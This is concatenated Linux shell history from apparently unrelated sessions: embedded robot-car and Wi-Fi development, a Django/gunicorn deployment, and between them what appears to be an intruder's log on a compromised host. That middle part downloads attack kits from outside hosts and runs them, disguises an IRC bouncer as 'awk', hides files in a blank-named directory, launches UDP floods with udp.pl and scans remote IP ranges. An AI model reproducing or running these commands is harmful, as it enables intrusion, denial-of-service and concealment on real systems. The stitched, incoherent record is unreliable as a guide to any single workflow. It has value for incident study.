wlan_ap.sh +ls +./wlan_ap.sh +ls +vi wlan_ap.sh +ls +ps -e | grep boa +ls +ls +vi remote.html +ls +ls +ls +vi post_handler.c +ls +make install +ls +ls +ls +vi remote.html +ls +ls +ls +vi post_handler.c +make install +ps | grep boa +ls +vi post_handler.c +ls +make install +ls +vi post_handler.c +make install +ls +vi remote_lib.c +ls +vi post_handler.c +make install +vi post_handler.c +make install +vi post_handler.c +ls +find . -type f -print | xargs grep cgiFormString +vi cgic.c +ls +vi post_handler.c +make install +vi post_handler.c +make install +vi post_handler.c +make install +ls +vi post_handler.c +make +cp post_handler.c post_handler.c.bak +ls +vi post_handler.c +make +ls +ls +mkdir cgic +ls +reboot +ls +source config_company.sh +ls +ls +wget +ls +tar zxf cgic206.tar.gz +ls +ls +vi Makefile +make +make install +ls +ls +ls +cp /root/cgic/cgic206/cgic.c . +ls +make +ls +reboot +ls +iwconfig +ls +./wlan_ap.sh +ls +ls +ls +make instal +make install +ls +vi post_handler.c +ls +make install +vi post_handler.c +make install +ls +ls +ls +vi user_code.c +ls +ls +ls +vi user_example.c +ls +cat user_code.c +ls +ls +ls +vi post_handler.c +ls +ls +ls +gcc -o a.out user_code.c +ls +rm a.out +ls +vi user_code.c +ls +rm user_code.c +ls +vi user_code.c +ls +ls +ls +vi post_handler.c +ls +ls +gcc -o ./user_home/a.out ./user_home/user_code.c +ls +ls +rm a.out +ls +ls +ls +ls +ls +ls +vi make_user_code.sh +ls +make_user_code.sh +./make_user_code.sh +ls +ls +vi post_handler.c +ls +ls +make_user_code.sh +ls +ls +vi post_handler.c +ls +make install +ls +ls +ls +ls +vi make_user_code.sh +dmesg +ls +ls +cp post_handler.c run_handler.c +vi run_handler.c +ls +vi Makefile +make install +ls +ls +ls +vi remote.html +ls +vi remote.html +ls +ls +ld +ls +ls +ls +vi post_handler.c +ls +ls +ls +vi remote.html +ls +ls +ls +vi post_handler.c +ls +make install +ls +ls +ls +ls +ls +vi user_code.c +ls +ls +ls +ls +ls +vi post_handler.c +make install +ls +ls +ls +vi user_code.c +ls +ls +ls +vi post_handler.c +ls +make install +ls +ls +ls +ls +ls +ls +ls +vi post_handler.c +make install +ls +ls +vi post_handler.c +make install +ls +ls +vi post_handler.c +ls +ls +vi run_handler.c +make install +ls +vi post_handler.c +make install +vi post_handler.c +make install +vi post_handler.c +make install +vi post_handler.c +make install +vi post_handler.c +make install +vi post_handler.c +make install +vi post_handler.c +make install +ls +vi run_handler.c +make install +vi run_handler.c +ls +ls +rm data +ls +ls +vi post_handler.c +l +vi cgic.c +ls +vi post_handler.c +ls +vi cgic.c +ls +vi post_handler.c +make install +vi post_handler.c +ls +vi cgic.c +ls +vi post_handler.c +make install +vi post_handler.c +make install +vi post_handler.c +make +make install +ls +vi cgic.c +ls +vi post_handler.c +ls +vi cgic.c +ls +vi post_handler.c +make install +vi post_handler.c +make install +vi post_handler.c +make install +ls +vi cgic.c +ls +vi run_handler.c +vi post_handler.c +ls +vi run_handler.c +ls +vi post_handler.c +make install +ls +vi post_handler.c +make install +vi post_handler.c +make install +vi post_handler.c +make install +ls +vi post_handler.c +make install +vi post_handler.c +make install +vi post_handler.c +make install +vi post_handler.c +make install +vi post_handler.c +make install +vi post_handler.c +ls +vi run_handler.c +make install +vi run_handler.c +ls +vi post_handler.c +make install +ls +ls +ls +halt +PuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYls +reboot +ls +vi wlan_ap.sh +ls +./wlan_ap.sh +reboot +ls +ls +ls +ls +ls +vi ultrasonic_xil_io.c +ls +vi config_company.sh +ls +vi wlan_ap.sh +ifconfig -a | grep wlan| wc -l +ifconfig -a | grep wlan +ifconfig -a | grep wlan | awk "{print $1}" +ifconfig -a | grep wlan | awk '{print $1}' +vi wlan_ap.sh +ls +vi wlan_normal.sh +ls +./wlan_normal.sh +ls +vi wlan_normal.sh +ls +./wlan_normal.sh +free -m +reboot +ls +./wlan_normal.sh +ls +./wlan_ap.sh +vi wlan_ap.sh +ls +vi /etc/rc.local +ls +reboot +ls +clear +ls +ls +ls +vim smartercar. +vim smartercar.c +ls +vim test.py +l +scp smartercar.c lijingjiang@ +scp smartercar.c lijingjiang@ +exit +vi /etc/profile +vi /etc/rc.local +halt +mount /dev/mmcblk0p1 /mnt +ls +insmod RT2870STA.dat +insmod mt7601Usta.ko +cp RT2870STA.dat /etc/Wireless/RT2860STA/ +ls +iwconfig +iwconfig ra0 up +ls +cp /mnt/mt7601Usta.ko /etc/Wireless/RT2860STA/ +reboot +ls +mount /dev/mmcblk0p1 /mnt +ls +cp *.dat /etc/Wireless/RT2860STA/ +cp README_STA_usb /etc/Wireless/RT2860STA/ +ls +insmod mt7601Usta.ko +dmesg +ifconfig -a +ifconfig ra0 up +ifconfig +dmesg +ls +ifconfig -a +ls +./wlan_ap.sh +ls +vi wlan_normal.sh +reboot +ls +./wlan_normal.sh +ifconfig -a +rt28xx init fail +ls +ls +cp -r RT2860STA/ RT2870STA +ls +apt-get install linux-frameware +apt-get install linux-firmware +ls +ls +ls +dmesg +lsusb +ls +ls +insmod mt7601Usta.ko +lsmod +dmesg +iwconfig +ifconfig ra0 up +ifconfig +ls +vi wlan_normal.sh +ls +iwlist ra0 scan +iwlist ra0 scan | grep SSID +ls /etc/Wireless/ +ls /etc/Wireless/RT2870STA +README_STA_usb RT2870STA.dat RT2870STACard.dat mt7601Usta.koifconfig +ifconfig +ls +ifconfig +reboot +ls +mkdir testlijingjiang +ls +gcc -I /usr/include/python2.7 -shared -fPIC car.c motor.c -o car.so +ks +gcc -I /usr/include/python2.7 -shared -fPIC car.c motor.c -o car.so +vim motor. +vim motor.c +ls +vim xil_io.h +ls +vim motor.h +vim car.c +ls +gcc -I /usr/include/python2.7 -shared -fPIC car.c motor.c -o car.so +ls +locate xil_io.h +locate +vim xil_io.h +gcc -I /usr/include/python2.7 -shared -fPIC car.c motor.c -o car.so +vim xil_io.h +ls +vim car.c +vim motor.h +vim xil_io.h +ifconfi +ifconfig +ifconfig +ls +ifconfig +which ifconfig +iwlist +locate +pwd +ls | grep *.sh +ls +source config_company.sh +ls +rm -rf testlijingjiang/ +ls +mkdir TEST +ls +ls +sudo apt-get install ipython +ipython +ls +ls +rm -rf car.so +ifconfig +ls +gcc -I /usr/include/python2.7 -shared -fPIC car.c motor.c xil_io.c -o car.so +ls +lks +ls +ipython +ls +ls +ls +ls +vim openhwcar +./openhwcar +ls +ls +ls +ls +vim package_c_test.c +./a.out +ls +./ins_mod.sh +./a.out +q +ls +ls +ls +ipython +ls +ls +ipython +ls +vim test.py +vim smartercar. +vim smartercar.c +ls +ls +ls +ls +ls +ls +ks +ls +./wlan_normal.sh +reboot +ls +./wlan_normal.sh +ls +source config_company.sh +apt-get install vlc browser-plugin-vlc +reboot +ls +ls +./ins_mod.sh +./a.out +q +ls +ls +ls +./test_pwm +clear +ls +ls +ls +vim smartercar. +ls +vim smartercar.c +ifconfig +ls +ls +ls +vim main.c +ls +gcc eye.c main.c motor.c roadctl.c sign.c -o move +ls +ls +ls +vim main.c +ls +ls +ls +make +ls +./openhwcar +ls +ls +vim main.c +vim eye.c +ls +ls +./openhwcar +vim ../src/main.c +vim ../src/eye.c +./openhwcar +ls +sudo reboot +iwconfig +ls +./wlan_normal.sh +ls /dev +ls +mount /dev/sda1 /mnt +ls +vlc +su xup +PuTTYPuTTYls +ls +./wlan_normal.sh +ls +./wlan_normal.sh +reboot +ls +./wlan_normal.sh +ls +source config_company.sh +ls +ifconfig +ls +./wlan_normal.sh +ls +ifconfig wlan7 down +./wlan_normal.sh +ls +reboot +ls +./wlan_normal.sh +reboot +ls +ls +mount /dev/sda1 /mnt +ls +clear +ls +ls +./openhwcar +ls +ls | grep 'mod' +ls +ls +ls +./openhwcar +reboot +ls +ipython +ls +cp openhwcar/ TEST +cp -r openhwcar/ TEST +ls +ls +ks +ls +ls +vim xil_io.h +locare sys | grep stat.h +locate sys | grep stat.h +locate +ls +ls +ifconfig +clear +ls +find +ls +clear +ls +ls +vim pwm_app.c +ls +./a.out +ls +vim pwm_app.c +ls +./a.out +file a.out +./a.out +./a +ls +vim pwm_app.c +ls +vim xil_io.h +ls +clear +ls +./a.out +vim pwm_app.c +ls +gcc pwm_app.c +ls +./a.out +vim pwm_app.c +ls +gcc pwm_app.c +./a.out +ls +vim pwm_app.c +ls +clear +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +vim xil_io.h +ls +vim main.c +ls +vim motor.c +vim motor.h +ls +vim motor.c +ls +vim motor.c +grep ACTION ./* +vim motor.h +ls +vim motor.c +ls +vim motor.h +vim +ls +vim xil_io.h +ls +vim motor.c +gcc motor.c -o lijingjiang +vim motor.c +ls +gcc motor.c -o lijingjiang +vim motor.c +ls +vim main.c +ls +vim motor. +vim motor.c +gcc motor.c -o lijingjiang +vim main.c +ls +vim sign.c +ls +vim xil_io.h +ls +clear +ls +vim xil_io.h +ls +clear +ls +gcc motor. +gcc motor.c +vim motor.c +gcc motor.c +ls +./a.out +rm a.out +ls +vim motor. +vim motor.c +ls +gcc motor.c +ls +./a.out +reboot +ls +clear +ls +ipython +vim +ls +clear +ipython +ls +clear +ls +vim /etc/rc.local +exec +man exec +clear +ls +ls +ls +ls +clear +ls +;s +ls +ls +ls +rm -rf TEST/ +ls +mkdir TEST_TEMP +ls +ls +clear +ls +gcc -I /usr/include/python2.7 motor.c xil_io.c car.c -shared -fPIC -o car.so +ls +ipython +ls +clear +ls +vim motor. +vim motor.c +gcc -I /usr/include/python2.7 -shared -fPIC xil_io.c motor.c car.c -o car.so +ipython +ls +vim car.c +ls +vim motor.c +ls +gcc -I /usr/include/python2.7 -shared -fPIC xil_io.c motor.c car.c -o car.so +vim car. +vim car.c +ls +vim motor. +vim motor.c +vim motor.h +vim motor.c +gcc -I /usr/include/python2.7 -shared -fPIC xil_io.c motor.c car.c -o car.so +vim motor.c +gcc -I /usr/include/python2.7 -shared -fPIC xil_io.c motor.c car.c -o car.so +ls +rm car.so +vim car.c +gcc -I /usr/include/python2.7 -shared -fPIC xil_io.c motor.c car.c -o car.so +vim car.c +gcc -I /usr/include/python2.7 -shared -fPIC xil_io.c motor.c car.c -o car.so +ls +ipython +ls +lks +ls +clear +ls +vim car.c +ls +vim car.c +gcc -I /usr/include/python2.7 -shared -fPIC xil_io.c motor.c car.c -o car.so +ipython +kls +ls +vim car.c +gcc -I /usr/include/python2.7 -shared -fPIC xil_io.c motor.c car.c -o car.so +ipython +ls +vim car.c +gcc -I /usr/include/python2.7 -shared -fPIC xil_io.c motor.c car.c -o car.so +ipython +clear +ipython +ls +vim car. +vim motor.c +ipython +ls +vim motor.c +gcc -I /usr/include/python2.7 -shared -fPIC xil_io.c motor.c car.c -o car.so +sleep(1) +sleep +vim motor.c +gcc -I /usr/include/python2.7 -shared -fPIC xil_io.c motor.c car.c -o car.so +ipython +ls +vim car.c +vim motor.c +vim motor.h +vim car.c +vim motor.c +gcc -I /usr/include/python2.7 -shared -fPIC xil_io.c motor.c car.c -o car.so +vim motor.c +gcc -I /usr/include/python2.7 -shared -fPIC xil_io.c motor.c car.c -o car.so +ipython +ls +vim car.c +ls +clear +ls +vim car.c +rm -rf car.so +ls +clear +ls +gcc -I /usr/include/python2.7 -shared -fPIC xil_io.c motor.c car.c -o car.so +ipython +ls +fcle +clear +ls +vim motor.c +gcc -I /usr/include/python2.7 -shared -fPIC xil_io.c motor.c car.c -o car.so +ipython +clear +ls +vim motor.c +gcc -I /usr/include/python2.7 -shared -fPIC xil_io.c motor.c car.c -o car.so +ipython +ls +vim car.c +vim motor.c +vim car.c +reboot +ls +ifconfig +./wlan_normal.sh +ifconfig +mkdir LJJ +ifconfig +ping +ls +ls +gcc -I /usr/include/python2.7 -shared -fPIC xil_io.c xil_io.h car.c -o car.so +ls +ipython +ls +vim car.c +ls +clear +ls +ipython +vim car.c +ls +vim motor.c +ls +vim motor.h +ls +rm car.s +rm car.so +gcc -I /usr/include/python2.7 -shared -fPIC *.c -o car.so +ls +file car. +file car.so +ipython +reboot +ls +ls +scp LJJ lijingjiang@ +ifconfig +../wlan_normal.sh +scp ./* lijingjiang@ +clear +ls +ls +ls +ls +make +ls +clear +ls +file openhwcar +ls +vim Makefile +clear +ls +vim CMakeLists.txt +ls +clear +ls +ls +ls +ls +ls +LS] +LS +ls +ls +LS +ls +ls +;s +ls +ls +vim Makefile +ls +vim ~/.bashrc +clr +clear +ls +vim Makefile +clear +ls +clear +make +clear +ls +vim CMake +vim CMakeLists.txt +ls +clear +ls +ls +ls +ls +vim cmake_install.cmake +clear +ls +ls +src +ls +vim eye.c +ls +vim sign.c +vim eye.h +ls +vim sign.c +ls +vim roadctl.c +ls +vim main.c +clear +ls +clear +ls +vim xil_io.h +clear +ls +ls +ls +ls +vim test3 +vim test3.log +ls +vim test0.log +ls +grep test ./src/* +vim ./src/eye.h +ls +ls +vim CMakeLists.txt +ls +vim arch_src.sh +ls +vim arch_img.sh +ks +ls +vim arch_img.sh +ls +clear +ls +vim cmake_install.cmake +ls +vim Makefile +ls +vim Makefile +ls +clear +vim cmake_install.cmake +ls +make clean +vim Makefile +make clean +ls +make +ls +file openhwcar +clear +ls +./openhwcar +ls +./openhwcar +ls +reboot +dmesg +reboot +vi /etc/rc.local +reboot +ls +ls +vi ins_mod.sh +insmod /etc/Wireless/RT2870STA/mt7601Usta.ko +dmesg +ifconfig -a +ls +vi ins_mod.sh +vi /etc/rc.local +vi ~/.bashrc +reboot +PuTTYPuTTY +ls +vi wlan_ap.sh +ls +./wlan_ap.sh +boa +ln -s /root/boa-master/src/boa boa +ls +./wlan_ap.sh +lsmod +vi wlan_ap.sh +./wlan_ap.sh +lsmod +lsmod | grep mt7610 +./wlan_ap.sh +vi wlan_ap.sh +./wlan_ap.sh +ifconfig -a +ls +vi wlan_ap.sh +ls +./wlan_ap.sh +ls +vi wlan_ap.sh +ls +./wlan_ap.sh +cat wlan_ap.sh +ifconfig -a | grep r +ifconfig -a | grep ra +ifconfig -a | grep ra0 +ifconfig -a | grep wlan +vi wlan_ap.sh +ls +./wlan_ap.sh +ls +vi wlan_ap.sh +ls +./wlan_ap.sh +vi wlan_ap.sh +ls +ls +vi ins_mod.sh +ls +cp package_c/ins_mod.sh . +vi ins_mod.sh +lsmod +rmmod mt7601Usta +lsmod +ls +./ins_mod.sh +vi ins_mod.sh +lsmod +lsmod | grep mt7601 +./ins_mod.sh +vi ins_mod.sh +./ins_mod.sh +vi ins_mod.sh +ls +./ins_mod.sh +vi ins_mod.sh +./ins_mod.sh +ls +vi wlan_normal.sh +ls +vi mjp +vi mjpg_start.sh +ls +vi ins_mod.sh +ls +./ins_mod.sh +vi ins_mod.sh +vi mjpg_start.sh +ls +./ins_mod.sh +vi ins_mod.sh +lsmod +ls +ls +./ins_mod.sh +ls +./wlan_ap.sh +vi wlan_ap.sh +./wlan_ap.sh +ifconfig +ls +./mjpg_start.sh +vi mjpg_start.sh +ls +./mjpg_start.sh +ls +vi wlan_ap.sh +l +vi mjpg_start.sh +ls +vi go.sh +ls +ls +vi mjpg_start.sh +ln -s /root/mjpeg_face_leaf_detection/mjpg-streamer/mjpg_streamer mjpg_streamer +ll mjpg_streamer +ls +./mjpg_start.sh +ls +ls +./a.out +halt +reboot +ls +vi wlan_ap.sh +ls +vi ins_mod.sh +ls +vi ins_mod.sh +./ins_mod.sh +vi ins_mod.sh +ls +reboot +ls +ifconfig -a +ls +./ins_mod.sh +lsmo +lsmod +vi ins_mod.sh +./ins_mod.sh +vi ins_mod.sh +lsmod | grep mt7601 +"`lsmod | grep mt7601`x" +"`lsmod | grep mt7601`" +`lsmod | grep mt7601` +`lsmod | grep mt7601`x +"`lsmod | grep mt7601`x" +echo "`lsmod | grep mt7601`x" +vi ins_mod.sh +"x" +vi ins_mod.sh +./ins_mod.sh +vi ins_mod.sh +ls +./ins_mod.sh +ls +lsmod +vi ins_mod.sh +ls +reboot +ls +./ins_mod.sh +vi wlan_ap.sh +ls +vi wlan_normal.sh +ls +./wlan_normal.sh +ifconfig -a +ls +vi wlan_normal.sh +./wlan_normal.sh +vi wlan_normal.sh +ls +./wlan_normal.sh o +ls +vi wlan_normal.sh +./wlan_normal.sh +ls +vi wlan_normal.sh +./wlan_normal.sh +vi wlan_normal.sh +ls +./wlan_normal.sh +ls +vi wlan_normal.sh +./wlan_normal.sh +ls +vi wlan_normal.sh +./wlan_normal.sh +vi wlan_normal.sh +./wlan_normal.sh +ls +vi wlan_normal.sh +./wlan_normal.sh +ifconfig -a +dmesg +reboot +ifconfig -a +dmesg +lsusb +ls +vi /etc/rc.local +reboot +ls +vi ins_mod.sh +reboot +ifconfig -a +./wlan_normal.sh +vi wlan_normal.sh +./wlan_normal.sh +vi wlan_normal.sh +./wlan_normal.sh +ls +vi wlan_normal.sh +./wlan_normal.sh +vi wlan_normal.sh +ls +./wlan_normal.sh +vi wlan_normal.sh +./wlan_normal.sh +vi wlan_normal.sh +ls +reboot +./wlan_normal.sh +vi wlan_normal.sh +./wlan_normal.sh +reboot +ls +./wlan_ap.sh +ls +ls +ls +ls +make install +vi Makefile +make install +ls +ls +./mjpg_start.sh +ls +ls +ls +ls +vi user_example.c +ls +ls +ls +make install +l +s +ls +halt +ls +reboot +ls +./wlan_ap.sh +ifconfig -a +ls +./wlan_ap.sh +vi /etc/rc.local +ls +vi /etc/rc.local +reboot +vi /etc/rc.local +ls +vi ins_mod.sh +vi /etc/rc.local +reboot +locate +ls +./wlan_normal.sh +ls +apt-cache search locate +apt-get install slocate +apt-get install locate +locate +halt +ls +clear +ls +ls +ls +touch authorized_keys +ls +cat id_rsa.pub >> authorized_keys +exit +clear +ls +ifconfig +clear +ls +clear +exit +ls +clear +ls +clear +exit +sudo git clone +ifconfig +ifconifi +ifconfig +sudo git clone +wgetssell/oh-my-zsh/raw/master/tools/install.sh -O - | sh +wgetssell/oh-my-zsh/raw/master/tools/install.sh -O - | sh --no-check-certificate +clear +apt-get install locate +apt-get install zsh +zsh +ls +clear +ls +zhs +ls +s +zsh +ls +clear +ls +zsh +ls +clear +ls +rm -rf ~/.zshrc +ls +clear +ls +zsh +exit +ls +clear +ls +ls +ls +clear +ls +clear +ls +ls +ls +ls +clear +rm -rf ~/.zsh* +ls +rm -rf ~/.oh-my-zsh/ +ls +clear +ls +ls -al +rm -rf ~/.vim ~/.spf13-vim-3/ +vim +ls +clear +ls +clear +ls +ls +ls +./openhwcar +ls +./openhwcar +ls +clear +ls +ls +clear +ls +rm optical_driver.tar.gz +ls +clear +ls +halt +ping free.fr +ssh +echo "echo toto" > toto.sh +ls -lh +ls -alh +cat .bash_history +sh ./toto.sh +ping free.fr +mv toto.sh /tmp/ +ls -lh /tmp/ +ls -lhZ /tmp/ +sh /tmp/toto.sh +ping +sh /tmp/toto.sh +ping +ping +sh /tmp/toto.sh +sh /tmp/toto.sh +ping +oracle +w +uname -a +ps -x +cat /proc/cpuinfp +cat /proc/cpuinfo +/sbin/ifconfig | grep inet +passwd +mkdir " " +/sbin/ifconfig | grep inet +wget www.members.lycos.co.uk/sck8erel/copils.tgz;tar zxvf copils.tgz; cd " " ;rm -rf copils.tgz; mv bash usrbin ; chmod +x usrbin; PATH=:PATH ;usrbin +w +ls +ls +ls +./scan +rm -rf udp.pl toto.sh scan.tgz scan flood b3ngos.tgz 404.shtml +ls +./toto.sh +toto.sh +tar xzvf scan.tgz +ls +ls +wget gabytu.xhost.ro/665 +ls +wget gabytu.xhost.ro/665 +rm 0rf 404.shtml.1 +rm -rf 404.shtml.1 +ps -aux +wgetsybnc.info/download/beta/psyBNC-2.3.2-7.tar.gz +wgetsybnc.info/download/beta/psyBNC-2.3.2-7.tar.gz +wgetstnet.com/lamer2k.tar.gz +tar xzvf lamer2k.tar.gz + ./config daniel 6667 + ./config daniel 6668 + ./config daniel 6 + ./config dani 31337 +./run +ls +./config daniel 19592 +ping -t +wget mysmart.uv.ro/rohack.tar +tar xzvf rohack.tar +./fuck +ls +uname -a +hostname +host +hosts +wget help-bnc.octopis.com/psybnc-linux.tgz +wget help-bnc.octopis.com/psybnc-linux.tgz +wgetsybnc.info/download/beta/psyBNC-2.3.2-7.tar.gz +wgetstuffs/psybnc-no-ssl-linux.tar.gz +tar xzvf psybnc-no-ssl-linux.tar.gz +mv psybnc awk +export PATH="." +awk +ping -t 65000 +ping +ls +c.. +ls +pint -t +ping +ping -t 65000 +ping -t 65000 +ping -f -t 65000 +6ls +ls +ls +ls +tar xzvf scan.tgz +tar xvf scan.tgz +tar -xzvf scan.tgz +ls +tar xvf flood.mp3 +ls +./misu +perl udp.pl +perl udp.pl 0 0 +perl udp.pl 22 0 +w +ls +./flood +./udp.pl +perl udp.pl +perl udp.pl 0 0 +perl udp.pl 0 0 +ls +ps -aux +ls +perl udp.pl 0 0 +ls +ls +perl udp.pl 53 0 +perl udp.pl 22 0 +uname -a +wget +tar +ps -aux +wget www.geocities.com/had3ss/Hadess.tar.gz +tar xzvf Hadess.tar.gz +ls +vi mech.set +./httpd +./httpd +mv ./httpd +mv httpd awk +export PATH="." +awk +ls +ls +exit +w +ls +ls +ls -all +ls +l;s +ls +ls +ls +wget +ps 0aux +ps -aux +wget mysmart.uv.ro/rohack.tar +ls +ls +rm -rf scan +;s +ls +awk +wget mysmart.uv.ro/rohack.tar +tar xzvf rohack.tar +./fuck 200 +./fuck +ls +ls +rm -rf climb3r +ls +./climb3r +ls +tar xzvf psy.tar.gz +ls +mv psybnc awk +./run +run +fuck +/\psybnc +psybnc +;s +;ls +ls +vi psybnc.conf +tar xzvf prepsybnc.tar.gz +ls +ls +sybnc +psybnc +./psybnc +mv psybnc awk +src +;s +exit +logout +ls +ls +./flood +ls +./cast +./smak +ls +perl udp.pl 53 0 + perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +ls +perl udp.pl 53 0 +perl udp.pl 0 0 +perl udp.pl 22 0 +perl udp.pl 53 0 +ls +tar xzvf crackscan.tgz +tar xvf crackscan.tgz +ls +ls +vi vuln.txt +./assh +./assh 200 +ls +./atak +./atack +ls +perl udp.pl 0 0 +exit +uname -a +ps -aux +kill -9 1980 1971 +ls +ps -aux +kill -9 1973 +ps -aux +ps -aux +ls +rm -rf Hadess.tar.gz Hadess +ls +rm -rf climb3r b3ngos.tgz 404.shtml AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +ls +rm -rf 404.shtml +ls +tar xzvf lamer2k.tar.gz +./config login 31337 +exit +logout +ls +perl udp.pl 53 0 +perl udp.pl 22 0 +exit +w +wget +ls +wget archive.lydo.org/ssh.tar +tar xzvf ssh.tar +tar xvf ssh.tar +.ls +ls +./a +./a 200 +./a 217.172 +wget dor.xhost.ro/arhive/privat/abtc.tgz +tar xvf abtc.tgz +ls +./a +./a +./start +./start 200.129 +w +ps -aux +./start 200.129 +passwd +passwd +w +./start 200.129 +ps -aux +./start 200.129 +./start 200.129 +w +ls +;s +ls +ls +rm -rf udp.pl udp.pl.1 udp.pl.2 psybnc psybnc.tar.gz sir.tgz psyBNC-2.3.2-7.tar.gz +ls +./m +ps -aux +kill -9 14490 14386 14376 14367 +ps -aux +kill -9 14363 +ps -aux +kill -9 14386 14388 +ps -aux +kill -9 14372 14378 14382 +ps -aux +ps -aux +ls +w +ls +ls +exit +logout +ls +#1509417650 +bin/gunicorn_start +#1509417714 +nano bin/gunicorn_start +#1509417796 +mkdir run +#1509417819 +ls +#1509417831 +ls run +#1509417857 +rm -rf run +#1509417863 +ls +#1509417871 +mkdir run +#1509417881 +ls -l +#1509417934 +touch run/gunicorn.sock +#1509417942 +tree run +#1509418366 +mv /dh/run /dh/runold +#1509418373 +ls dh +#1509418382 +ls +#1509418405 +mv /dh/runold /dh/run +#1509418420 +ls +#1509418442 +ls /dh/run +#1509418451 +ls /dh/ +#1509418463 +ls dh +#1509418541 +mv dh/run dh/runold +#1509418549 +ls dh +#1509418568 +nano bin/gunicorn_start +#1509418610 +bin/gunicorn_start +#1509418622 +nano bin/gunicorn_start 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log +#1509422532 +ls logs +#1509422558 +nano logs/nginx-error.log +#1509423227 +ls dh +#1509423242 +ls -l +#1509423255 +ls -l dh +#1509423464 +/ +#1509423553 +ls dh/static +#1509423707 +nano blog/templates/blog/base.html +#1509423755 +bin/gunicorn_start +#1509424336 +nano blog/templates/blog/about.html +#1509424408 +bin/gunicorn_start +#1509424490 +nano blog/templates/blog/about.html +#1509424515 +bin/gunicorn_start +#1509424547 +nano blog/templates/blog/about.html +#1509424608 +bin/gunicorn_start +#1509424624 +nano blog/templates/blog/about.html +#1509424692 +bin/gunicorn_start +#1509424711 +nano blog/templates/blog/about.html +#1509424747 +bin/gunicorn_start +#1509424765 +nano blog/templates/blog/about.html +#1509424815 +bin/gunicorn_start +#1509424967 +nano dhru/settings.py +#1509425225 +nano dhru/urls.py +#1509425539 +ls templates +#1509425549 +ls templates/account +#1509425572 +nano templates/account/base.html +#1509425596 +bin/gunicorn_start +#1509425750 +bin/gunicorn_start +#1509425781 +nano dhru/settings.py +#1509425803 +nano dhru/urls.py +#1509425820 +bin/gunicorn_start +#1509425826 +nano dhru/urls.py +#1509425840 +nano dhru/settings.py +#1509425862 +bin/gunicorn_start +#1509425880 +nano dhru/settings.py +#1509425996 +nano dhru/settings.py +#1509426173 +bin/gunicorn_start +#1509426183 +nano dhru/settings.py +#1509426291 +python manage.py migrate +#1509426332 +nano dhru/settings.py +#1509426407 +python manage.py migrate +#1509426478 +nano dhru/settings.py +#1509426504 +python manage.py migrate +#1509426516 +bin/gunicorn_start +#1509427143 +nano dhru/settings.py +#1509427216 +nano dhru/urls.py +#1509427250 +bin/gunicorn_start +#1509427610 +nano dhru/settings.py +#1509427699 +nano dhru/settings.py +#1509427760 +nano dhru/settings.py +#1509427876 +bin/gunicorn_start +#1509428376 +git status +#1509428817 +bin/gunicorn_start +#1509428837 +nano dhru/settings.py +#1509428956 +nano dhru/settings.py +#1509429069 +bin/gunicorn_start +#1509429960 +ls +#1509429973 +ls static +#1509429989 +ls static/admin +#1509430013 +ls static/blog +#1509430041 +rm -rf static +#1509430046 +ls +#1509430246 +python manage.py collectstatic +#1509430255 +ls +#1509430271 +bin/gunicorn_start +#1509430418 +deactivate +#1509430421 +exit +#1509442273 +source bin/activate +#1509442305 +nano dhru/urls.py +#1509442318 +bin/gunicorn_start +#1509442354 +nano dhru/urls.py +#1509443205 +nano dhru/settings.py +#1509443238 +source bin/activate +#1509443242 +nano dhru/settings.py +#1509443294 +bin/gunicorn_start +#1509443322 +nano dhru/settings.py +#1509443423 +bin/gunicorn_start +#1509443474 +nano dhru/settings.py +#1509443724 +nano dhru/settings.py +#1509443841 +ls logs +#1509443872 +nano logs/nginx-error.log +#1509444190 +bin/gunicorn_start +#1509444236 +nano logs/nginx-error.log +#1509444363 +deactivate +#1509444368 +exit +#1509444518 +source bin/activate +#1509444523 +bin/gunicorn_start +#1509444566 +deactivate +#1509444573 +logout +#1509444610 +source bin/activate +#1509444613 +bin/gunicorn_start +#1509444633 +deactivate +#1509444635 +logout +#1509444647 +source bin/activate +#1509444650 +bin/gunicorn_start +#1509444672 +deactivate +#1509444676 +logout +#1509444754 +source bin/activate +#1509444757 +bin/gunicorn_start +#1509444767 +ls +#1509444777 +ls run +#1509444790 +ls -l run/ +#1509444794 +ls -l run +#1509444841 +tree run +#1509444858 +ls -l +#1509444884 +nano bin/gunicorn_start +#1509444919 +bin/gunicorn_start +#1509444947 +nano bin/gunicorn_start +#1509444963 +bin/gunicorn_start +#1509444981 +nano bin/gunicorn_start +#1509444993 +bin/gunicorn_start +#1509445004 +nano bin/gunicorn_start +#1509445045 +bin/gunicorn_start +#1509445069 +nano bin/gunicorn_start +#1509445098 +bin/gunicorn_start +#1509445102 +nano bin/gunicorn_start +#1509445124 +bin/gunicorn_start +#1509445157 +nano bin/gunicorn_start +#1509445172 +bin/gunicorn_start +#1509445182 +nano bin/gunicorn_start +#1509445198 +bin/gunicorn_start +#1509445219 +ls +#1509445229 +tree run +#1509445247 +ls run +#1509445298 +bin/gunicorn_start +#1509445335 +tree static +#1509445392 +touch static/500.html +#1509445404 +nano static/500.html +#1509445606 +bin/gunicorn_start +#1509445672 +ls +#1509445686 +ls run +#1509445698 +ls dh/run +#1509445704 +ls dh/ +#1509445715 +ls dh/run/ +#1509445742 +ls -l dh/ +#1509445759 +ls -l +#1509445815 +nano bin/gunicorn_start +#1509446447 +ls -l +#1509446473 +deactivate +#1509446478 +ls -l +#1509446497 +ls -l dh +#1509446518 +ls -l run +#1509446605 +nano .gitignore +#1509446691 +nano run/gunicorn.sock +#1509446700 +ls run +#1509446722 +git status +#1509446748 +git add --all . +#1509446772 +git commit -m "db" +#1509446846 +git push - +#1509447232 +nano dhru/settings.py +#1509447342 +bin/gunicorn_start +#1509447397 +nano dhru/urls.py +#1509447410 +bin/gunicorn_start +#1509450298 +logout +#1509453480 +source bin/activate +#1509453500 +ls static +#1509453526 +nano static/500.html +#1509453597 +nano static/500.html +#1509453676 +deactivate +#1509453682 +logout +#1509462350 +source 